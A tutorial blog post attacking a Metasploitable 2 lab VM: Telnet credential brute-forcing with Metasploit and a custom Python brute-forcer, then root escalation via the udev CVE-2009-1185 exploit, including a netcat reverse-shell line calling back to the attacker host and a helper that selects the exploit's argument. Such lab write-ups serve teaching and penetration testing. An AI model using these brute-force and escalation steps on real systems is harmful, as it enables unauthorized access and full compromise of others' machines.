Metasploit in Practice: Telnet Brute-Forcing and Privilege Escalation

2019-07-11  DreamsonMa

Telnet is a cleartext protocol: everything the user sends, including the username and password, crosses the network unencrypted. That is a real security risk, and it is why many servers disable the Telnet service.

Telnet belongs to the TCP/IP protocol family and is the standard protocol, and the classic way, of providing remote login over the Internet. It lets a user do work on a remote host from a local machine: the user runs a telnet program on their own computer, connects to the server, and types commands into it; those commands run on the server exactly as if they had been typed at the server's console.

Simple and convenient as it is, Telnet has fallen out of favour in today's security-conscious networks for the reason just given: it offers no encryption at all, so anyone on the path can read the whole session, credentials included. Many servers therefore ship with Telnet disabled, and if you want to log in this way you first have to check that the Telnet service is installed and enabled on the remote server.

The Telnet server listens on TCP port 23 by default.

Fingerprinting the Telnet Service

Before attacking a Telnet service we want to know what host and what software we are dealing with. The nmap probe below identifies the service as a Linux telnetd and the operating system as a Linux kernel (the CPE in the Service Info line). Note that it reports no version number: this tells us which implementation is listening, not whether any particular bug applies, which is why the next step is password guessing rather than a version-specific exploit.

➜  ~ nmap -p23 -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:42 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds

Cracking the Telnet Password

Next we use Metasploit to guess the Telnet username and password.

1. Start msfconsole. The "No database support" warning it prints matters later: without a database msfconsole cannot store the credentials the scanner finds (the module run below repeats the same warning). If you want them saved, initialise the database first with msfdb init on Kali.

➜  ~ msfconsole 
[-] * Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > 

2. Run search telnet to list the modules that involve Telnet

msf5 > search  telnet

Matching Modules
================

   Name                                                               Disclosure Date  Rank       Check  Description
   ----                                                               ---------------  ----       -----  -----------
   auxiliary/admin/http/dlink_dir_300_600_exec_noauth                 2013-02-04       normal     No     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
   auxiliary/dos/cisco/ios_telnet_rocem                               2017-03-17       normal     No     Cisco IOS Telnet Denial of Service
   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof                       2010-12-21       normal     No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   auxiliary/scanner/ssh/juniper_backdoor                             2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   auxiliary/scanner/telnet/brocade_enable_login                                       normal     Yes    Brocade Enable Login Check Scanner
   auxiliary/scanner/telnet/lantronix_telnet_password                                  normal     Yes    Lantronix Telnet Password Recovery
   auxiliary/scanner/telnet/lantronix_telnet_version                                   normal     Yes    Lantronix Telnet Service Banner Detection
   auxiliary/scanner/telnet/satel_cmd_exec                            2017-04-07       normal     Yes    Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
   auxiliary/scanner/telnet/telnet_encrypt_overflow                                    normal     Yes    Telnet Service Encryption Key ID Overflow Detection
   auxiliary/scanner/telnet/telnet_login                                               normal     Yes    Telnet Login Check Scanner
   auxiliary/scanner/telnet/telnet_ruggedcom                                           normal     Yes    RuggedCom Telnet Password Generator
   auxiliary/scanner/telnet/telnet_version                                             normal     Yes    Telnet Service Banner Detection
   auxiliary/server/capture/telnet                                                     normal     No     Authentication Capture: Telnet
   exploit/freebsd/ftp/proftp_telnet_iac                              2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/freebsd/telnet/telnet_encrypt_keyid                        2011-12-23       great      No     FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   exploit/linux/ftp/proftp_telnet_iac                                2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/http/asuswrt_lan_rce                                 2018-01-22       excellent  No     AsusWRT LAN Unauthenticated Remote Code Execution
   exploit/linux/http/dlink_diagnostic_exec_noauth                    2013-03-05       excellent  No     D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
   exploit/linux/http/dlink_dir300_exec_telnet                        2013-04-22       excellent  No     D-Link Devices Unauthenticated Remote Command Execution
   exploit/linux/http/huawei_hg532n_cmdinject                         2017-04-15       excellent  Yes    Huawei HG532n Command Injection
   exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection  2015-12-20       excellent  No     TP-Link SC2020n Authenticated Telnet Injection
   exploit/linux/misc/asus_infosvr_auth_bypass_exec                   2015-01-04       excellent  No     ASUS infosvr Auth Bypass Command Execution
   exploit/linux/misc/hp_jetdirect_path_traversal                     2017-04-05       normal     No     HP Jetdirect Path Traversal Arbitrary Code Execution
   exploit/linux/telnet/netgear_telnetenable                          2009-10-30       excellent  Yes    NETGEAR TelnetEnable
   exploit/linux/telnet/telnet_encrypt_keyid                          2011-12-23       great      No     Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   exploit/solaris/telnet/fuser                                       2007-02-12       excellent  No     Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   exploit/solaris/telnet/ttyprompt                                   2002-01-18       excellent  No     Solaris in.telnetd TTYPROMPT Buffer Overflow
   exploit/unix/misc/polycom_hdx_auth_bypass                          2013-01-18       normal     Yes    Polycom Command Shell Authorization Bypass
   exploit/unix/misc/polycom_hdx_traceroute_exec                      2017-11-12       excellent  Yes    Polycom Shell HDX Series Traceroute Command Execution
   exploit/unix/polycom_hdx_auth_bypass                               2013-01-18       normal     Yes    Polycom Command Shell Authorization Bypass
   exploit/unix/webapp/dogfood_spell_exec                             2009-03-03       excellent  Yes    Dogfood CRM spell.php Remote Command Execution
   exploit/windows/proxy/ccproxy_telnet_ping                          2004-11-11       average    Yes    CCProxy Telnet Proxy Ping Overflow
   exploit/windows/telnet/gamsoft_telsrv_username                     2000-07-17       average    Yes    GAMSoft TelSrv 1.5 Username Buffer Overflow
   exploit/windows/telnet/goodtech_telnet                             2005-03-15       average    No     GoodTech Telnet Server Buffer Overflow
   payload/cmd/unix/bind_busybox_telnetd                                               normal     No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   payload/cmd/unix/reverse                                                            normal     No     Unix Command Shell, Double Reverse TCP (telnet)
   payload/cmd/unix/reverse_bash_telnet_ssl                                            normal     No     Unix Command Shell, Reverse TCP SSL (telnet)
   payload/cmd/unix/reverse_ssl_double_telnet                                          normal     No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   post/windows/gather/credentials/mremote                                             normal     No     Windows Gather mRemote Saved Password Extraction

3. Pick the brute-force auxiliary module and set its options. USERPASS_FILE takes a file of "user password" pairs, one per line; the piata list shipped with Metasploit is a small set of common defaults and is enough for Metasploitable 2.

msf5 > use auxiliary/scanner/telnet/telnet_login  
msf5 auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             23               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/telnet/telnet_login) > set USER
set USERNAME       set USERPASS_FILE  set USER_AS_PASS   set USER_FILE      
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set THREADS 5
THREADS => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

   Name              Current Setting                                        Required  Description
   ----              ---------------                                        --------  -----------
   BLANK_PASSWORDS   false                                                  no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                      yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                  no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                  no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                  no        Add all users in the current database to the list
   PASSWORD                                                                 no        A specific password to authenticate with
   PASS_FILE                                                                no        File containing passwords, one per line
   RHOSTS            10.0.2.5                                               yes       The target address range or CIDR identifier
   RPORT             23                                                     yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                  yes       Stop guessing when a credential works for a host
   THREADS           5                                                      yes       The number of concurrent threads
   USERNAME                                                                 no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/wordlists/metasploit/piata_ssh_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                  no        Try the username as the password for all users
   USER_FILE                                                                no        File containing usernames, one per line
   VERBOSE           true                                                   yes       Whether to print output for all attempts

4. Run the module and pick up the session. Two things to notice in the run below: STOP_ON_SUCCESS was left at false, so the module kept guessing after the hit until it was interrupted with Ctrl-C (set STOP_ON_SUCCESS true to avoid that noise), and because there is no database the valid credential is only printed on the console and attached to the session, not stored. The session is a plain Telnet shell, which is why every command typed into it is echoed back once by the server before its output appears.

msf5 auxiliary(scanner/telnet/telnet_login) > run

[!] 10.0.2.5:23           - No active DB -- Credential data will not be saved!
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:root (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: test:test (Incorrect: )
[+] 10.0.2.5:23           - 10.0.2.5:23 - Login Successful: msfadmin:msfadmin
[*] 10.0.2.5:23           - Attempting to start session 10.0.2.5:23 with msfadmin:msfadmin
[*] Command shell session 1 opened (10.0.2.12:34457 -> 10.0.2.5:23) at 2019-07-11 00:46:41 -0400
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:matrix (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: ghost:ghost (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:sleeper (Incorrect: )
^C[*] 10.0.2.5:23           - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -l

Active sessions
===============

  Id  Name  Type   Information                             Connection
  --  ----  ----   -----------                             ----------
  1         shell   TELNET msfadmin:msfadmin (10.0.2.5:23)  10.0.2.12:34457 -> 10.0.2.5:23 (10.0.2.5)

msf5 auxiliary(scanner/telnet/telnet_login) > sessions -i 1
[*] Starting interaction with 1...

id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$ 
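The two points made above, that a Telnet client has to answer option negotiation before it ever sees a login prompt, and that whatever it then sends crosses the wire in cleartext, are easiest to see with both ends of the exchange in hand. The following is an added example written for this post; it is not the author's code and not Metasploit's telnet_login. It runs a constructed stand-in for a Unix telnetd on loopback (its banner, prompts and the msfadmin:msfadmin credential are assumptions chosen to mirror Metasploitable 2) and a client that does, per attempt, what the module does: refuse every option the server requests or offers, wait for "login:" and "Password:", send one pair, and judge the reply. The server records every pair exactly as it arrived on the socket, which is what a sniffer on the path would see. The pair list is a constructed stand-in for the head of piata_ssh_userpass.txt.

```python
import socket
import threading

IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254

def strip_iac(buf):
    """Split raw Telnet bytes into (cleartext, replies, leftover): refuse every
    DO/WILL, drop IAC SB..SE, unescape IAC IAC, keep a cut-off sequence as leftover."""
    text, replies, i = bytearray(), bytearray(), 0
    while i < len(buf):
        if buf[i] != IAC:
            text.append(buf[i]); i += 1
        elif i + 1 >= len(buf):
            break                                    # lone IAC: need more data
        elif buf[i + 1] == IAC:
            text.append(IAC); i += 2                 # escaped literal 0xFF
        elif buf[i + 1] in (DO, DONT, WILL, WONT):
            if i + 2 >= len(buf):
                break                                # option byte not here yet
            answer = {DO: WONT, WILL: DONT}.get(buf[i + 1])   # refuse; DONT/WONT need no reply
            if answer:
                replies += bytes([IAC, answer, buf[i + 2]])
            i += 3
        elif buf[i + 1] == SB:
            end = buf.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break                                # subnegotiation cut short
            i = end + 2
        else:
            i += 2                                   # NOP, GA, ...: two bytes
    return bytes(text), bytes(replies), bytes(buf[i:])

def read_until(sock, state, markers):
    """Read cleartext until a (lowercase) marker appears, answering negotiation
    on the way; state[0] carries leftover bytes between calls."""
    text = b""
    while not any(m in text.lower() for m in markers):
        chunk = sock.recv(4096)
        if not chunk:
            break                                    # peer closed
        clean, replies, state[0] = strip_iac(state[0] + chunk)
        sock.sendall(replies)
        text += clean
    return text

def try_login(host, port, user, password):
    """One guess on its own connection, as telnet_login does per pair; a shell
    prompt with no 'incorrect' in the reply counts as success."""
    state = [b""]
    try:
        with socket.create_connection((host, port), timeout=3.0) as s:
            read_until(s, state, [b"login:"])
            s.sendall(user.encode() + b"\r\n")       # cleartext on the wire
            read_until(s, state, [b"password:"])
            s.sendall(password.encode() + b"\r\n")   # and so is this
            out = read_until(s, state, [b"login:", b"$ ", b"# "])
    except OSError:
        return False
    return b"incorrect" not in out.lower() and (b"$ " in out or b"# " in out)

def brute_force(host, port, pairs, stop_on_success=True):
    """Walk a USERPASS_FILE-style list; stop_on_success=False keeps guessing
    after a hit, as the run above did until Ctrl-C."""
    hits = []
    for user, pw in pairs:
        if try_login(host, port, user, pw):
            hits.append((user, pw))
            if stop_on_success:
                break
    return hits

def fake_telnetd(listener, valid, wire_log):
    """Constructed stand-in for a Unix telnetd: negotiate, prompt, judge.
    wire_log gets each (user, password) exactly as it arrived: cleartext."""
    while True:
        try:
            conn, _ = listener.accept()
        except OSError:                              # listener timed out/closed
            return
        with conn:
            conn.settimeout(3.0)
            state = [b""]
            conn.sendall(bytes([IAC, DO, 24, IAC, WILL, 1]))  # DO TERMINAL-TYPE, WILL ECHO
            conn.sendall(b"Ubuntu 8.04\r\nmetasploitable login: ")
            user = read_until(conn, state, [b"\n"]).split(b"\n")[0].strip()
            conn.sendall(b"Password: ")
            pw = read_until(conn, state, [b"\n"]).split(b"\n")[0].strip()
            pair = (user.decode(errors="replace"), pw.decode(errors="replace"))
            wire_log.append(pair)
            if pair == valid:
                conn.sendall(b"\r\nmsfadmin@metasploitable:~$ ")
            else:
                conn.sendall(b"\r\nLogin incorrect\r\nmetasploitable login: ")

def demo():
    """Attack the fake server on loopback and return (hits, wire_log); the pair
    list is a constructed stand-in for the head of the userpass file."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    listener.settimeout(2.0)                         # lets the server thread end
    wire_log = []
    threading.Thread(target=fake_telnetd, daemon=True,
                     args=(listener, ("msfadmin", "msfadmin"), wire_log)).start()
    pairs = [("root", "root"), ("admin", "admin"), ("msfadmin", "msfadmin"), ("test", "test")]
    hits = brute_force("127.0.0.1", listener.getsockname()[1], pairs)
    listener.close()
    return hits, wire_log
```

Calling demo() returns the single hit, msfadmin:msfadmin, and a wire log of the three pairs that were tried before the loop stopped; with stop_on_success=False the fourth pair is tried as well, which is the extra traffic and log noise the STOP_ON_SUCCESS option exists to avoid. Note that refusing every option is fine for a login check but not for an interactive session; a real client accepts at least ECHO and SUPPRESS-GO-AHEAD.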

Privilege Escalation

The shell we obtained runs as the unprivileged msfadmin user, so let's see how to escalate to root. (The id output above shows msfadmin in the admin group, which on a stock Ubuntu 8.04 sudoers means sudo with the password we already know would also get root; the udev exploit below is the route that works even when the account has no sudo rights.)

1. On Kali, download the exploit and start an HTTP server to serve it. Exploit-DB 8572 is the local privilege escalation for udev before release 141 (CVE-2009-1185): udevd of that era did not check that NETLINK_KOBJECT_UEVENT messages actually came from the kernel, so any local user could send a forged uevent and have udevd run a program of their choosing as root. Debian's nginx default site serves /var/www/html, which is why the file is placed there.

➜  ~ cd /var/www/html
➜  ~ wget http://www.exploit-db.com/download/8572
➜  ~ systemctl start nginx

2. Start a netcat listener on Kali

➜  ~ nc -lvp 4444

listening on [any] 4444 ...

3. From the target shell obtained above, download the exploit

msfadmin@metasploitable:~$ wget http://10.0.2.12/8572
wget http://10.0.2.12/8572
--09:18:28--  http://10.0.2.12/8572
           => `8572'
Connecting to 10.0.2.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [application/octet-stream]

100%[====================================>] 2,876         --.--K/s             

09:18:28 (561.72 KB/s) - `8572' saved [2876/2876]

4. Everything is in place, time to escalate

Compile the exploit with gcc, write the script it will execute, and run it. The exploit makes udevd run /tmp/run as root, so that script simply starts a reverse shell back to the Kali listener.
The exploit's single argument is not "a pid with root privileges minus one": it is the netlink port id of udevd's uevent socket. On this udev release that value is the udevd pid minus one (udevd bound the socket before forking into the background, and the exploit's own usage comment says as much), which is why 2301 is passed for the udevd that ps shows at pid 2302 below. The reliable way to get the number is to read /proc/net/netlink and take the non-zero Pid entry whose Eth column is 15 (NETLINK_KOBJECT_UEVENT) rather than trusting the minus-one rule.

msfadmin@metasploitable:~$ mv 8572 8572.c
mv 8572 8572.c
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ gcc 8572.c -o exploit
gcc 8572.c -o exploit
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run
echo '#!/bin/sh' > /tmp/run
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ps -edf |grep udev
ps -edf |grep udev
root      2302     1  0 08:48 ?        00:00:00 /sbin/udevd --daemon
msfadmin  4847  4844  0 09:44 pts/1    00:00:00 grep udev
msfadmin@metasploitable:~$ chmod +x exploit
chmod +x exploit
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ./exploit 2301
./exploit 2301
msfadmin@metasploitable:~$ 

5. Check the netcat listener on Kali. The connection arrives from the target and id reports uid=0: the shell that udevd spawned from /tmp/run runs as root.

➜  ~ nc -lvp 4444

listening on [any] 4444 ...


id
10.0.2.5: inverse host lookup failed: Unknown host
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.5] 50536
uid=0(root) gid=0(root)
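The "udevd pid minus one" rule in step 4 is a heuristic, and the check a practitioner wants before running the exploit is to read the port id straight out of /proc/net/netlink. The following is an added example for this post, not code from the author or from the exploit; it parses that listing together with ps -edf output, chooses the argument to pass to ./exploit, says where the number came from, and adds a udev version check against the release that fixed the bug. The netlink sample is constructed to match a 2.6.24-era kernel's column layout, with the 15/2301 row mirroring the udevd at pid 2302 seen in step 4; the ps sample is taken from the lines shown there. Metasploitable 2 itself only has Python 2.5, so run this on Kali against text copied from the target, or on any modern Linux box via live_argument().

```python
import re
import subprocess

NETLINK_KOBJECT_UEVENT = 15      # Eth column value of the uevent family (linux/netlink.h)

def uevent_socket_pids(netlink_text):
    """Port ids of user-space sockets bound to NETLINK_KOBJECT_UEVENT, read from
    /proc/net/netlink text. The columns start 'sk Eth Pid ...' on every kernel
    generation (newer kernels only append columns); Pid 0 is the kernel's own."""
    pids = []
    for line in netlink_text.splitlines():
        cols = line.split()
        if len(cols) >= 3 and cols[1].isdigit() and cols[2].isdigit():
            if int(cols[1]) == NETLINK_KOBJECT_UEVENT and int(cols[2]) != 0:
                pids.append(int(cols[2]))
    return pids

def udevd_pid(ps_text):
    """udevd's pid from 'ps -edf' output; the 'grep udev' line does not match."""
    for line in ps_text.splitlines():
        cols = line.split(None, 7)               # UID PID PPID C STIME TTY TIME CMD
        if len(cols) == 8 and cols[7].startswith("/sbin/udevd"):
            return int(cols[1])
    return None

def exploit_argument(netlink_text, ps_text):
    """What to pass to ./exploit, and why. The socket listing is the source of
    truth; the 'udevd pid minus one' rule of thumb is only the fallback."""
    pids = uevent_socket_pids(netlink_text)
    daemon = udevd_pid(ps_text)
    if daemon is not None and daemon - 1 in pids:
        return daemon - 1, "listing confirms udevd pid - 1"
    if len(pids) == 1:
        return pids[0], "from /proc/net/netlink"
    if daemon is not None and not pids:
        return daemon - 1, "guess: udevd pid - 1 (no uevent socket listed)"
    return None, "no usable udevd netlink socket found"

def udev_vulnerable(version_text):
    """True if the release printed by 'udevadm --version' (older boxes: 'udevd
    --version') predates 141, the release that fixed CVE-2009-1185."""
    m = re.search(r"\d+", version_text)
    return m is not None and int(m.group()) < 141

def live_argument():
    """Same decision on the machine this runs on (Linux, Python 3.7+)."""
    with open("/proc/net/netlink") as f:
        netlink_text = f.read()
    ps = subprocess.run(["ps", "-edf"], capture_output=True, text=True)
    return exploit_argument(netlink_text, ps.stdout)

# Constructed sample of /proc/net/netlink in the 2.6.24-era layout; the 15/2301
# row mirrors the udevd that ps showed at pid 2302 in step 4.
SAMPLE_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
c7a1e000 0   0      00000000 0        0        00000000 2
c7a1e400 15  0      00000000 0        0        00000000 2
c7a1e800 15  2301   00000001 0        0        00000000 2
c7a1ec00 16  0      00000000 0        0        00000000 2
"""
# The ps -edf lines from step 4, with the header row ps prints added back.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root      2302     1  0 08:48 ?        00:00:00 /sbin/udevd --daemon
msfadmin  4847  4844  0 09:44 pts/1    00:00:00 grep udev
"""

if __name__ == "__main__":
    print(exploit_argument(SAMPLE_NETLINK, SAMPLE_PS))   # (2301, 'listing confirms udevd pid - 1')
    print(udev_vulnerable("117"))                          # True: Ubuntu 8.04's udev predates 141
```

On the sample data the listing and the rule of thumb agree on 2301, which is the argument used in step 4. When they disagree, or when several uevent sockets are listed (a second udev-aware daemon on the box), the function reports it instead of silently picking one, which is the failure the minus-one shortcut hides.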
